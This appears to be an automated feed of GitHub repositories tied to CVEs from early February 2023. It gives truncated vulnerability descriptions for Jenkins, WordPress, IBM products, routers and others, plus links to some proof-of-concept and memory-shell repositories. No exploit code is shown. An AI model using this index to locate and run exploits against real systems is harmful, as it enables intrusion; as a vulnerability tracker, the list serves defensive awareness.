**A vulnerability, which was classified as problematic, has been found in XXL-JOB 2.3.1. Affected by this issue is some unknown functionality of the file /user/updatePwd of the component New Password Handler. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0674](https://github.com/Live-Hack-CVE/CVE-2023-0674) create time: 2023-02-04T11:26:29Z

**A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. Affected by this vulnerability is an unknown functionality of the file oews/products/view_product.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The associated identifier of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0673](https://github.com/Live-Hack-CVE/CVE-2023-0673) create time: 2023-02-04T11:26:26Z

**CVE-2022-44268 PoC** : [Baikuya/CVE-2022-44268-PoC](https://github.com/Baikuya/CVE-2022-44268-PoC) create time: 2023-02-04T10:50:20Z

**A vulnerability classified as problematic was found in NREL api-umbrella-web 0.7.1. This vulnerability affects unknown code of the component Flash Message Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.8.0 is able to address this issue. The name of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10072](https://github.com/Live-Hack-CVE/CVE-2015-10072) create time: 2023-02-04T07:05:11Z

**A vulnerability was found in Segmentio is-url up to 1.2.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely. Upgrading to version 1.2.3 is able to address CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25079](https://github.com/Live-Hack-CVE/CVE-2018-25079) create time: 2023-02-04T07:05:15Z

**OpenMage LTS is an e-commerce platform. Prior to versions 19.4.22 and 20.0.19, Custom Layout enabled admin users to execute arbitrary commands via block methods. Versions 19.4.22 and 20.0.19 contain patches for this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39217](https://github.com/Live-Hack-CVE/CVE-2021-39217) create time: 2023-02-04T07:06:10Z

**A stored cross-site scripting (XSS) vulnerability in identification.php of Piwigo v13.4.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User-Agent. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48007](https://github.com/Live-Hack-CVE/CVE-2022-48007) create time: 2023-02-04T07:06:04Z

**An arbitrary file upload vulnerability in the plugin manager of LimeSurvey v5.4.15 allows attackers to execute arbitrary code via a crafted PHP file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48008](https://github.com/Live-Hack-CVE/CVE-2022-48008) create time: 2023-02-04T07:05:58Z

**LimeSurvey v5.4.15 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the component /index.php/surveyAdministration/rendersidemenulink?subaction=surveytexts. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description or We CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48010](https://github.com/Live-Hack-CVE/CVE-2022-48010) create time: 2023-02-04T07:05:51Z

**no description** : [MaskCyberSecurityTeam/CVE-2022-26134_Behinder_MemShell](https://github.com/MaskCyberSecurityTeam/CVE-2022-26134_Behinder_MemShell) create time: 2023-02-04T06:51:47Z

**XSS Vulnerability in HP Deskjet 2540 series printer Firmware Version CEP1FN1418BR and Product Model Number A9U23B HTTP configuration page** : [swzhouu/CVE-2022-48311](https://github.com/swzhouu/CVE-2022-48311) create time: 2023-02-04T06:23:57Z

**Jenkins Semantic Versioning Plugin 1.14 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24430](https://github.com/Live-Hack-CVE/CVE-2023-24430) create time: 2023-02-04T07:05:54Z

**A missing permission check in Jenkins JIRA Pipeline Steps Plugin 2.0.165.v8846cf59f3db and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24438](https://github.com/Live-Hack-CVE/CVE-2023-24438) create time: 2023-02-04T07:05:46Z

**Jenkins Semantic Versioning Plugin 1.14 and earlier does not restrict execution of an controller/agent message to agents, and implements no limitations about the file path that can be parsed, allowing attackers able to control agent processes to have Jenkins parse a crafted file that uses external entities for extracti CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24429](https://github.com/Live-Hack-CVE/CVE-2023-24429) create time: 2023-02-04T07:05:43Z

**A cross-site request forgery (CSRF) vulnerability in Jenkins Bitbucket OAuth Plugin 0.12 and earlier allows attackers to trick users into logging in to the attacker's account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24428](https://github.com/Live-Hack-CVE/CVE-2023-24428) create time: 2023-02-04T07:05:40Z

**Jenkins JIRA Pipeline Steps Plugin 2.0.165.v8846cf59f3db and earlier stores the private keys unencrypted in its global configuration file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24439](https://github.com/Live-Hack-CVE/CVE-2023-24439) create time: 2023-02-04T07:05:37Z

**Jenkins JIRA Pipeline Steps Plugin 2.0.165.v8846cf59f3db and earlier transmits the private key in plain text as part of the global Jenkins configuration form, potentially resulting in their exposure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24440](https://github.com/Live-Hack-CVE/CVE-2023-24440) create time: 2023-02-04T07:05:33Z

**Jenkins Bitbucket OAuth Plugin 0.12 and earlier does not invalidate the previous session on login. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24427](https://github.com/Live-Hack-CVE/CVE-2023-24427) create time: 2023-02-04T07:05:28Z

**A sandbox bypass vulnerability involving map constructors in Jenkins Script Security Plugin 1228.vd93135a_2fb_25 and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24422](https://github.com/Live-Hack-CVE/CVE-2023-24422) create time: 2023-02-04T07:05:25Z

**Baicells Nova 227, Nova 233, and Nova 243 LTE TDD eNodeB devices with firmware through RTS/RTD 3.7.11.3 have hardcoded credentials that are easily discovered and can be used by remote attackers to authenticate via ssh. (The credentials are stored in the firmware, encrypted by the crypt function.) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24022](https://github.com/Live-Hack-CVE/CVE-2023-24022) create time: 2023-02-04T07:05:21Z

**Code Injection in GitHub repository froxlor/froxlor prior to 2.0.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0671](https://github.com/Live-Hack-CVE/CVE-2023-0671) create time: 2023-02-04T07:05:18Z

**XSS Vulnerability in HP Deskjet 2540 series printer Firmware Version CEP1FN1418BR and Product Model Number A9U23B HTTP configuration page** : [swzhouu/CVE-2022-48311](https://github.com/swzhouu/CVE-2022-48311) create time: 2023-02-04T06:11:29Z

**An information disclosure vulnerability that could be exploited to read arbitrary files from a server when parsing an image in Image Magic.** : [Ashifcoder/CVE-2022-44268-automated-poc](https://github.com/Ashifcoder/CVE-2022-44268-automated-poc) create time: 2023-02-04T03:50:07Z

**A vulnerability was found in fanzila WebFinance 0.5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file htdocs/prospection/save_contact.php. The manipulation of the argument nom/prenom/email/tel/mobile/client/fonction/note leads to sql injection. The name of the pat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-10018](https://github.com/Live-Hack-CVE/CVE-2013-10018) create time: 2023-02-04T01:28:19Z

**A vulnerability was found in fanzila WebFinance 0.5. It has been classified as critical. Affected is an unknown function of the file htdocs/admin/save_roles.php. The manipulation of the argument id leads to sql injection. The name of the patch is 6cfeb2f6b35c1b3a7320add07cd0493e4f752af3. It is recommended to apply a pa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-10017](https://github.com/Live-Hack-CVE/CVE-2013-10017) create time: 2023-02-04T01:28:16Z

**IBM Security Guardium Big Data Intelligence (SonarG) 4.0 uses hard coded credentials which could allow a local user to obtain highly sensitive information. IBM X-Force ID: 161035. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4309](https://github.com/Live-Hack-CVE/CVE-2019-4309) create time: 2023-02-04T01:29:04Z

**Dell EMC Open Manage System Administrator (OMSA) versions prior to 9.3.0 contain an Improper Range Header Processing Vulnerability. A remote unauthenticated attacker may send crafted requests with overlapping ranges to cause the application to compress each of the requested bytes, resulting in a crash due to excessive CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3721](https://github.com/Live-Hack-CVE/CVE-2019-3721) create time: 2023-02-04T01:29:01Z

**Use-after-free in Bluetooth in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to execute arbitrary code via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13725](https://github.com/Live-Hack-CVE/CVE-2019-13725) create time: 2023-02-04T01:28:57Z

**An issue was discovered in Xen through 4.12.x allowing ARM guest OS users to cause a denial of service or gain privileges by leveraging the erroneous enabling of interrupts. Interrupts are unconditionally unmasked in exception handlers. When an exception occurs on an ARM system which is handled without changing process CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18422](https://github.com/Live-Hack-CVE/CVE-2019-18422) create time: 2023-02-04T01:28:54Z

**Insufficient data validation in SQLite in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to bypass defense-in-depth measures via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13750](https://github.com/Live-Hack-CVE/CVE-2019-13750) create time: 2023-02-04T01:28:44Z

**Insufficient policy enforcement in extensions in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13754](https://github.com/Live-Hack-CVE/CVE-2019-13754) create time: 2023-02-04T01:28:41Z

**Incorrect security UI in Omnibox in Google Chrome on iOS prior to 79.0.3945.79 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13749](https://github.com/Live-Hack-CVE/CVE-2019-13749) create time: 2023-02-04T01:28:33Z

**Jenkins NeoLoad Plugin 2.2.5 and earlier stored credentials unencrypted in its global configuration file and in job config.xml files on the Jenkins master where they could be viewed by users with Extended Read permission, or access to the master file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10440](https://github.com/Live-Hack-CVE/CVE-2019-10440) create time: 2023-02-04T01:28:30Z

**Jenkins iceScrum Plugin 1.1.4 and earlier stored credentials unencrypted in job config.xml files on the Jenkins master where they could be viewed by users with Extended Read permission, or access to the master file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10443](https://github.com/Live-Hack-CVE/CVE-2019-10443) create time: 2023-02-04T01:28:26Z

**In the Zingbox Inspector, versions 1.294 and earlier, hardcoded credentials for root and inspector user accounts are present in the system software, which can result in unauthorized users gaining access to the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15015](https://github.com/Live-Hack-CVE/CVE-2019-15015) create time: 2023-02-04T01:28:09Z

**An SQL injection vulnerability exists in the management interface of Zingbox Inspector versions 1.288 and earlier, that allows for unsanitized data provided by an authenticated user to be passed from the web UI into the database. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15016](https://github.com/Live-Hack-CVE/CVE-2019-15016) create time: 2023-02-04T01:28:05Z

**The SSH service is enabled on the Zingbox Inspector versions 1.294 and earlier, exposing SSH to the local network. When combined with PAN-SA-2019-0027, this can allow an attacker to authenticate to the service using hardcoded credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15017](https://github.com/Live-Hack-CVE/CVE-2019-15017) create time: 2023-02-04T01:28:02Z

**In FusionPBX up to 4.5.7, the file app\contacts\contact_addresses.php uses an unsanitized "id" variable coming from the URL, which is reflected in HTML, leading to XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16972](https://github.com/Live-Hack-CVE/CVE-2019-16972) create time: 2023-02-04T00:21:33Z

**An issue was discovered in FusionPBX up to 4.5.7. In the file app\conference_controls\conference_control_details.php, an unsanitized id variable coming from the URL is reflected in HTML on 2 occasions, leading to XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16968](https://github.com/Live-Hack-CVE/CVE-2019-16968) create time: 2023-02-04T00:21:29Z

**resources/cmd.php in FusionPBX up to 4.5.7 suffers from a command injection vulnerability due to a lack of input validation, which allows authenticated administrative attackers to execute any commands on the host as www-data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16965](https://github.com/Live-Hack-CVE/CVE-2019-16965) create time: 2023-02-04T00:21:26Z

**In WordPress before 5.2.4, unauthenticated viewing of certain content is possible because the static query property is mishandled. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17671](https://github.com/Live-Hack-CVE/CVE-2019-17671) create time: 2023-02-04T00:21:22Z

**WordPress before 5.2.4 is vulnerable to a stored XSS attack to inject JavaScript into STYLE elements. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17672](https://github.com/Live-Hack-CVE/CVE-2019-17672) create time: 2023-02-04T00:21:18Z

**WordPress before 5.2.4 does not properly consider type confusion during validation of the referer in the admin pages, possibly leading to CSRF. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17675](https://github.com/Live-Hack-CVE/CVE-2019-17675) create time: 2023-02-04T00:21:14Z

**WordPress before 5.2.4 is vulnerable to stored XSS (cross-site scripting) via the Customizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17674](https://github.com/Live-Hack-CVE/CVE-2019-17674) create time: 2023-02-04T00:21:11Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 5.6.45 and prior and 5.7.27 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Suc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2924](https://github.com/Live-Hack-CVE/CVE-2019-2924) create time: 2023-02-04T00:21:05Z

**Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/ODBC). Supported versions that are affected are 5.3.13 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successfu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2920](https://github.com/Live-Hack-CVE/CVE-2019-2920) create time: 2023-02-04T00:21:01Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 5.6.45 and prior and 5.7.27 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Suc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2922](https://github.com/Live-Hack-CVE/CVE-2019-2922) create time: 2023-02-04T00:20:57Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 5.6.45 and prior and 5.7.27 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Suc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2923](https://github.com/Live-Hack-CVE/CVE-2019-2923) create time: 2023-02-04T00:20:54Z

**Symonics libmysofa 0.7 has an invalid read in getDimension in hrtf/reader.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16095](https://github.com/Live-Hack-CVE/CVE-2019-16095) create time: 2023-02-04T00:20:51Z

**Symonics libmysofa 0.7 has an invalid read in readOHDRHeaderMessageDataLayout in hdf/dataobject.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16094](https://github.com/Live-Hack-CVE/CVE-2019-16094) create time: 2023-02-04T00:20:47Z

**Symonics libmysofa 0.7 has an invalid write in readOHDRHeaderMessageDataLayout in hdf/dataobject.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16093](https://github.com/Live-Hack-CVE/CVE-2019-16093) create time: 2023-02-04T00:20:44Z

**Symonics libmysofa 0.7 has a NULL pointer dereference in getHrtf in hrtf/reader.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16092](https://github.com/Live-Hack-CVE/CVE-2019-16092) create time: 2023-02-04T00:20:41Z

**Symonics libmysofa 0.7 has an out-of-bounds read in directblockRead in hdf/fractalhead.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16091](https://github.com/Live-Hack-CVE/CVE-2019-16091) create time: 2023-02-04T00:20:37Z

**This vulnerability allows local attackers to escalate privileges on affected installations of TP-Link Archer A7 Firmware Ver: 190726 AC1750 routers. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10883](https://github.com/Live-Hack-CVE/CVE-2020-10883) create time: 2023-02-04T01:29:16Z

**This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Archer A7 Firmware Ver: 190726 AC1750 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the tdpServer service, which listens on UDP port 20002 by defau CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10882](https://github.com/Live-Hack-CVE/CVE-2020-10882) create time: 2023-02-04T01:29:12Z

**By carefully crafting promise resolutions, it was possible to cause an out-of-bounds read off the end of an array resized during script execution. This could have led to memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird < 68.6, Firefox < 74, Firefox < ESR68.6, and Firefox ESR CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6806](https://github.com/Live-Hack-CVE/CVE-2020-6806) create time: 2023-02-04T01:29:08Z

**In the Linux kernel before 5.15.3, fs/quota/quota_tree.c does not validate the block number in the quota tree (on disk). This can, for example, lead to a kernel/locking/rwsem.c use-after-free if there is a corrupted quota file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45868](https://github.com/Live-Hack-CVE/CVE-2021-45868) create time: 2023-02-04T01:28:48Z

**The Jetpack Carousel module of the JetPack WordPress plugin before 9.8 allows users to create a "carousel" type image gallery and allows users to comment on the images. A security vulnerability was found within the Jetpack Carousel module by nguyenhg_vcs that allowed the comments of non-published page/posts to be leake CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24374](https://github.com/Live-Hack-CVE/CVE-2021-24374) create time: 2023-02-04T01:28:37Z

**Detect images that likely exploit CVE-2022-44268** : [jnschaeffer/cve-2022-44268-detector](https://github.com/jnschaeffer/cve-2022-44268-detector) create time: 2023-02-04T01:35:08Z

**A memory corruption vulnerability exists in the cgi.c unescape functionality of ArduPilot APWeb master branch 50b6b7ac - master branch 46177cb9. A specially-crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28711](https://github.com/Live-Hack-CVE/CVE-2022-28711) create time: 2023-02-04T01:28:12Z

**Symfony is a PHP framework for web and console applications and a set of reusable PHP components. When authenticating users Symfony by default regenerates the session ID upon login, but preserves the rest of session attributes. Because this does not clear CSRF tokens upon login, this might enables same-site attackers t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24895](https://github.com/Live-Hack-CVE/CVE-2022-24895) create time: 2023-02-04T00:20:23Z

**Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The Symfony HTTP cache system, acts as a reverse proxy: It caches entire responses (including headers) and returns them to the clients. In a recent change in the `AbstractSessionListener`, the response might contain a `Set CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24894](https://github.com/Live-Hack-CVE/CVE-2022-24894) create time: 2023-02-04T00:20:19Z

**Grafana is an open-source platform for monitoring and observability. When datasource query caching is enabled, Grafana caches all headers, including `grafana_session`. As a result, any user that queries a datasource where the caching is enabled can acquire another user’s session. To mitigate the vulnerability you can d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23498](https://github.com/Live-Hack-CVE/CVE-2022-23498) create time: 2023-02-04T00:20:16Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: This CVE has been rejected as it was incorrectly assigned. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24806](https://github.com/Live-Hack-CVE/CVE-2023-24806) create time: 2023-02-04T01:28:23Z

**Discourse is an open source discussion platform. The embeddable comments can be exploited to create new topics as any user but without any clear title or content. This issue is patched in the latest stable, beta and tests-passed versions of Discourse. As a workaround, disable embeddable comments by deleting all embedda CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23615](https://github.com/Live-Hack-CVE/CVE-2023-23615) create time: 2023-02-04T00:20:33Z

**A heap buffer overflow vulnerability in Kodi Home Theater Software up to 19.5 allows attackers to cause a denial of service due to an improper length of the value passed to the offset argument. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23082](https://github.com/Live-Hack-CVE/CVE-2023-23082) create time: 2023-02-04T00:20:30Z

**CKAN is an open-source DMS (data management system) for powering data hubs and data portals. When creating a new container based on one of the Docker images listed below, the same secret key was being used by default. If the users didn't set a custom value via environment variables in the `.env` file, that key was shar CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22746](https://github.com/Live-Hack-CVE/CVE-2023-22746) create time: 2023-02-04T00:20:26Z

**no description** : [es0j/CVE-2023-0045](https://github.com/es0j/CVE-2023-0045) create time: 2023-02-03T21:51:04Z

**IBM Security Access Manager 9.0.1 through 9.0.6 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 158572. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4156](https://github.com/Live-Hack-CVE/CVE-2019-4156) create time: 2023-02-03T22:06:56Z

**IBM Security Access Manager 9.0.1 through 9.0.6 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 158573. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4157](https://github.com/Live-Hack-CVE/CVE-2019-4157) create time: 2023-02-03T22:06:52Z

**IBM Jazz Foundation products (IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trust CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4250](https://github.com/Live-Hack-CVE/CVE-2019-4250) create time: 2023-02-03T22:06:48Z

**IBM Robotic Process Automation with Automation Anywhere 11 could allow an attacker with specialized access to obtain highly sensitive from the credential vault. IBM X-Force ID: 160758. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4295](https://github.com/Live-Hack-CVE/CVE-2019-4295) create time: 2023-02-03T22:06:45Z

**IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 Admin Console could allow a remote attacker to obtain sensitive information when a specially crafted url causes a stack trace to be dumped. IBM X-Force ID: 160202. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4269](https://github.com/Live-Hack-CVE/CVE-2019-4269) create time: 2023-02-03T22:06:41Z

**IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 159883. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4252](https://github.com/Live-Hack-CVE/CVE-2019-4252) create time: 2023-02-03T22:06:38Z

**IBM Robotic Process Automation with Automation Anywhere 11 information disclosure could allow a local user to obtain e-mail contents from the client debug log file. IBM X-Force ID: 160759. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4296](https://github.com/Live-Hack-CVE/CVE-2019-4296) create time: 2023-02-03T22:06:34Z

**IBM Tivoli Storage Manager Server (IBM Spectrum Protect 7.1 and 8.1) could allow a local user to replace existing databases by restoring old data. IBM X-Force ID: 158336. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4140](https://github.com/Live-Hack-CVE/CVE-2019-4140) create time: 2023-02-03T22:06:30Z

**IBM Daeja ViewONE Professional, Standard & Virtual 5.0 through 5.0.5 could allow an unauthorized user to download server files resulting in sensitive information disclosure. IBM X-Force ID: 160012. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4260](https://github.com/Live-Hack-CVE/CVE-2019-4260) create time: 2023-02-03T22:06:26Z

**An issue was discovered in Xen through 4.11.x allowing x86 PV guest OS users to cause a denial of service or gain privileges by leveraging a race condition that arose when XENMEM_exchange was introduced. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17342](https://github.com/Live-Hack-CVE/CVE-2019-17342) create time: 2023-02-03T22:06:22Z

**An issue was discovered in Xen through 4.12.x allowing Arm domU attackers to cause a denial of service (infinite loop) involving a compare-and-exchange operation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17350](https://github.com/Live-Hack-CVE/CVE-2019-17350) create time: 2023-02-03T22:06:18Z

**An issue was discovered in Xen through 4.11.x allowing x86 PV guest OS users to cause a denial of service or gain privileges by leveraging a page-writability race condition during addition of a passed-through PCI device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17341](https://github.com/Live-Hack-CVE/CVE-2019-17341) create time: 2023-02-03T22:06:14Z

**IBM Content Navigator 3.0CD is vulnerable to local file inclusion, allowing an attacker to access a configuration file in the ICN server. IBM X-Force ID: 160015. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4263](https://github.com/Live-Hack-CVE/CVE-2019-4263) create time: 2023-02-03T22:06:10Z

**IBM Security Information Queue (ISIQ) 1.0.0, 1.0.1, and 1.0.2 is missing the HTTP Strict Transport Security header. Users can navigate by mistake to the unencrypted version of the web application or accept invalid certificates. This leads to sensitive data being sent unencrypted over the wire. IBM X-Force ID: 158661. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4162](https://github.com/Live-Hack-CVE/CVE-2019-4162) create time: 2023-02-03T22:06:06Z

**IBM InfoSphere Information Server 11.5 and 11.7 is affected by an information disclosure vulnerability. Sensitive information in an error message may be used to conduct further attacks against the system. IBM X-Force ID: 159945. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4257](https://github.com/Live-Hack-CVE/CVE-2019-4257) create time: 2023-02-03T22:06:03Z

**IBM Cognos Controller 10.2.0, 10.2.1, 10.3.0, 10.3.1, and 10.4.0 could allow a remote attacker to obtain sensitive information, caused by a flaw in the HTTP OPTIONS method, aka Optionsbleed. By sending an OPTIONS HTTP request, a remote attacker could exploit this vulnerability to read secret data from process memory an CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4173](https://github.com/Live-Hack-CVE/CVE-2019-4173) create time: 2023-02-03T22:05:59Z

**Information Disclosure vulnerability in McAfee DXL Platform and TIE Server in DXL prior to 5.0.1 HF2 and TIE prior to 2.3.1 HF1 allows Authenticated users to view sensitive information in plain text via the GUI or command line. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3612](https://github.com/Live-Hack-CVE/CVE-2019-3612) create time: 2023-02-03T22:05:55Z

**IBM StoredIQ 7.6 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be truste CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4166](https://github.com/Live-Hack-CVE/CVE-2019-4166) create time: 2023-02-03T22:05:51Z

**Insufficient policy enforcement in developer tools in Google Chrome prior to 79.0.3945.79 allowed a local attacker to obtain potentially sensitive information from process memory via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13748](https://github.com/Live-Hack-CVE/CVE-2019-13748) create time: 2023-02-03T22:05:40Z

**Insufficient policy enforcement in Omnibox in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13746](https://github.com/Live-Hack-CVE/CVE-2019-13746) create time: 2023-02-03T22:05:35Z

**Insufficient policy enforcement in cookies in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to leak cross-origin data via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13744](https://github.com/Live-Hack-CVE/CVE-2019-13744) create time: 2023-02-03T22:05:32Z

**FrozenNode Laravel-Administrator through 5.0.12 allows unrestricted file upload (and consequently Remote Code Execution) via admin/tips_image/image/file_upload image upload with PHP content within a GIF image that has the .php extension. NOTE: this product is discontinued. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10963](https://github.com/Live-Hack-CVE/CVE-2020-10963) create time: 2023-02-03T22:05:47Z

**An exploitable out of bounds write vulnerability exists in version 2.2 of the Per Face Texture mapping application known as PTEX. The vulnerability is present in the reading of a file without proper parameter checking. The value read in, is not verified to be valid and its use can lead to a buffer overflow, potentially CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3835](https://github.com/Live-Hack-CVE/CVE-2018-3835) create time: 2023-02-03T19:54:29Z

